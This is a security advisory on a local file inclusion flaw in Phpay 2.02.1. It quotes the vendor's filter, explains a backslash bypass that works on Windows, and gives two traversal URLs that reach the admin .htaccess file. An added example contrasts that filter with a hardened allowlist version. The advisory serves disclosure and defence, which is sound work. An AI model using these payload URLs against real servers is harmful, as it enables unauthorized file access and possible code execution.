Phpay - Local File Inclusion

2007.12.20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

By Michael Brooks

Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage: http://sourceforge.net/projects/phpay/
Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws; as a result this patch was written:

$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");

To bypass this patch, backslashes can be used instead of forward slashes on Windows systems. Also, .inc.php must only exist *somewhere* in the string.

Local File Include for Windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration: there is a call to extract($_GET), so the exploit will work regardless of register_globals.

Using Linux is a very good fix for this issue.

Merry Christmas
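The advisory's blacklist filter beside a hardened replacement, as an added example that is not Phpay's own code. It assumes the config files live in the script's directory and reimplements the quoted ereg_replace/eregi calls with str_replace/stripos, which are equivalent for these literal patterns and still exist in current PHP.

```php
<?php
// Added example, not part of the Phpay project. The first function mirrors
// the filter quoted in the advisory; the second is a defensive replacement.

// The advisory's filter: strips ":", "../" and "/", then only demands that
// ".inc.php" appear *somewhere* in the string. Backslashes are never touched.
function weakConfigFilter(string $config): string {
    $config = str_replace(':', '', $config);
    $config = trim(str_replace('../', '', $config));
    $config = trim(str_replace('/', '', $config));
    if ($config === '' || stripos($config, '.inc.php') === false) {
        $config = 'config.inc.php';
    }
    return $config;
}

// Hardened replacement: the request may only *select* a name from a fixed
// allowlist, and the resolved path must still sit directly inside $baseDir.
// realpath() normalises both "/" and "\" separators, so the check holds on
// Windows as well as Linux, independent of magic_quotes_gpc.
function safeConfigPath(string $requested, string $baseDir, array $allowed): ?string {
    if (!in_array($requested, $allowed, true)) {
        return null;                      // unknown name: refuse, never "repair" it
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;                      // missing file: fail closed
    }
    if (dirname($full) !== $base) {
        return null;                      // containment check on the resolved path
    }
    return $full;
}

// Constructed input: the Windows-style string from the advisory.
$payload = 'eregi.inc.php\\..\\admin\\.htaccess';
var_dump(weakConfigFilter($payload));                          // returned unchanged
var_dump(safeConfigPath($payload, __DIR__, ['config.inc.php'])); // NULL: rejected

// How main.php would use it (hypothetical wiring, assumed for this example).
$path = safeConfigPath($_GET['config'] ?? 'config.inc.php', __DIR__, ['config.inc.php']);
if ($path === null) {
    http_response_code(400);
    exit('invalid config selection');
}
require $path;
```

Run from the CLI it prints the payload passing the weak filter, then NULL from the allowlisted version, then exits with the 400 branch because no config.inc.php exists beside the script.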


Copyright 2021, cxsecurity.com
